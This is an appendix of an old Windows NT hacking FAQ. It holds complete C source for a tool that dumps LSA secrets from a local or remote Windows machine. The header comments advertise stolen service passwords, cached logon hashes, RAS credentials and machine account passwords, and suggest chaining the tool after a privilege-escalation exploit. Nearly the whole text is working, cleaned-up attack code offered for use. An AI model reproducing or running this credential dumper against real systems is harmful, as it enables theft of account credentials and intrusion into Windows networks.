The Unofficial NT Hack FAQ - Appendix 3

A-03. Source Code for NT LSA Exploit


Author is Paul Ashton <paul@argo.demon.co.uk>
/*
 * Must be run as an administrator (the caller needs read access to LSA
 * private data). Might be a good thing to play with after running
 * getadmin ;-) -- also note this works on an unpatched Windows NT 4.0
 * with no service packs applied.
 *
 * Run as: prog _sc_schedule [machine], prog nl$1, prog w3_root_data
 * or any other secret stored under HKLM\SECURITY\Policy\Secrets
 * (pass the secret's name, optionally followed by a remote machine name).
 * You should be able to get service passwords, cached password hashes
 * of the last users to log on, RAS accounts and passwords, workstation
 * (machine account) passwords used for domain access, etc. The secret's
 * raw bytes are written to stdout as-is; no decoding is done.
 */

#include <windows.h>
#include <stdio.h>

#include "ntsecapi.h"
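/*
 * AST(x): abort with the failing source line when x is false.
 * Written as do { ... } while (0) so it is exactly one statement; the
 * original "if (...) {...} else" form left a dangling else that would
 * capture any statement written directly after AST(x).
 */
#define AST(x) do { if (!(x)) { printf("Failed line %d\n", __LINE__); exit(1); } } while (0)

/*
 * write() is the CRT's old-name alias of _write() (declared in <io.h>,
 * which this file does not include); declare it with its real signature
 * rather than as a void, argument-less function.  Note that stdout is a
 * text-mode descriptor by default, so bytes sent through it may undergo
 * newline translation.
 */
int write(int fd, const void *buf, unsigned int count);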

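/*
 * Wrap a NUL-terminated wide string in an LSA_UNICODE_STRING.
 *
 * x: wide string to wrap; must be non-NULL and NUL-terminated.
 * Returns a pointer to ONE static LSA_UNICODE_STRING, so the result is
 * only valid until the next call; callers must consume it before calling
 * str() again.
 *
 * Length and MaximumLength are byte counts held in a USHORT.  The buffers
 * this file passes are at most 256 WCHARs, so the narrowing cannot
 * overflow; the casts make it explicit.  wcslen() is evaluated once and
 * sizeof(WCHAR) replaces the magic constant 2.
 */
PLSA_UNICODE_STRING
str(LPWSTR x)
{
    static LSA_UNICODE_STRING s;
    size_t chars = wcslen(x);

    s.Buffer = x;
    s.Length = (USHORT)(chars * sizeof(WCHAR));
    s.MaximumLength = (USHORT)((chars + 1) * sizeof(WCHAR));
    return &s;
}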

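/*
 * Report a failed LSA call and exit.
 *
 * what: name of the call that failed.
 * st:   NTSTATUS it returned; also mapped to a Win32 error for readability.
 */
static void
die_status(const char *what, NTSTATUS st)
{
    fprintf(stderr, "%s failed: NTSTATUS 0x%08lx (Win32 error %lu)\n",
            what, (unsigned long)st,
            (unsigned long)LsaNtStatusToWinError(st));
    exit(1);
}

/*
 * Usage: prog <secret-name> [machine]
 *
 * Opens the LSA policy object (on the local system, or on [machine] if
 * given), retrieves the private data stored under <secret-name> and writes
 * its raw bytes to stdout.  Nothing is decoded; whatever the owner stored
 * is emitted unchanged.
 *
 * The caller must hold POLICY_GET_PRIVATE_INFORMATION on the policy
 * object, which by default only administrators have.
 *
 * Returns 0 on success; exits with status 1 on a usage error or any
 * failing call.
 */
int _cdecl
main(int argc, char *argv[])
{
    LSA_HANDLE pol;
    PLSA_UNICODE_STRING secret;
    LSA_OBJECT_ATTRIBUTES attrs;
    NTSTATUS st;
    WCHAR keyname[256] = L"";
    WCHAR host[256] = L"";
    PLSA_UNICODE_STRING sysname = NULL;   /* NULL = open the local policy */
    HANDLE out;
    DWORD written = 0;

    /* The original dereferenced argv[1] unconditionally (crash on no args). */
    if (argc < 2 || argc > 3) {
        fprintf(stderr, "usage: %s <secret-name> [machine]\n", argv[0]);
        exit(1);
    }

    /*
     * Bounded ANSI -> UTF-16 conversion.  wsprintfW(L"%hS") has no length
     * limit and would overflow keyname/host on a long argument;
     * MultiByteToWideChar returns 0 (and writes nothing useful) instead.
     */
    if (!MultiByteToWideChar(CP_ACP, 0, argv[1], -1,
                             keyname, sizeof keyname / sizeof keyname[0])) {
        fprintf(stderr, "secret name too long or not convertible\n");
        exit(1);
    }
    if (argc == 3) {
        if (!MultiByteToWideChar(CP_ACP, 0, argv[2], -1,
                                 host, sizeof host / sizeof host[0])) {
            fprintf(stderr, "machine name too long or not convertible\n");
            exit(1);
        }
        /* str() returns a shared static; it is consumed by LsaOpenPolicy
         * below before str() is called again for the secret name. */
        sysname = str(host);
    }

    memset(&attrs, 0, sizeof attrs);
    /*
     * POLICY_GET_PRIVATE_INFORMATION is the access LsaRetrievePrivateData
     * requires.  The original asked for 0, which the file header says only
     * worked on unpatched NT 4.0.
     */
    st = LsaOpenPolicy(sysname, &attrs, POLICY_GET_PRIVATE_INFORMATION, &pol);
    if (st != 0) {
        die_status("LsaOpenPolicy", st);
    }

    st = LsaRetrievePrivateData(pol, str(keyname), &secret);
    if (st != 0) {
        LsaClose(pol);
        die_status("LsaRetrievePrivateData", st);
    }

    /*
     * Write through the raw handle so the bytes are not subject to the
     * CRT's text-mode newline translation, and check the result.
     */
    out = GetStdHandle(STD_OUTPUT_HANDLE);
    if (out == NULL || out == INVALID_HANDLE_VALUE ||
        !WriteFile(out, secret->Buffer, secret->Length, &written, NULL) ||
        written != secret->Length) {
        fprintf(stderr, "write to stdout failed (error %lu)\n",
                (unsigned long)GetLastError());
        LsaFreeMemory(secret);
        LsaClose(pol);
        exit(1);
    }

    LsaFreeMemory(secret);   /* LSA-allocated; the original leaked it */
    LsaClose(pol);
    return 0;
}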

 
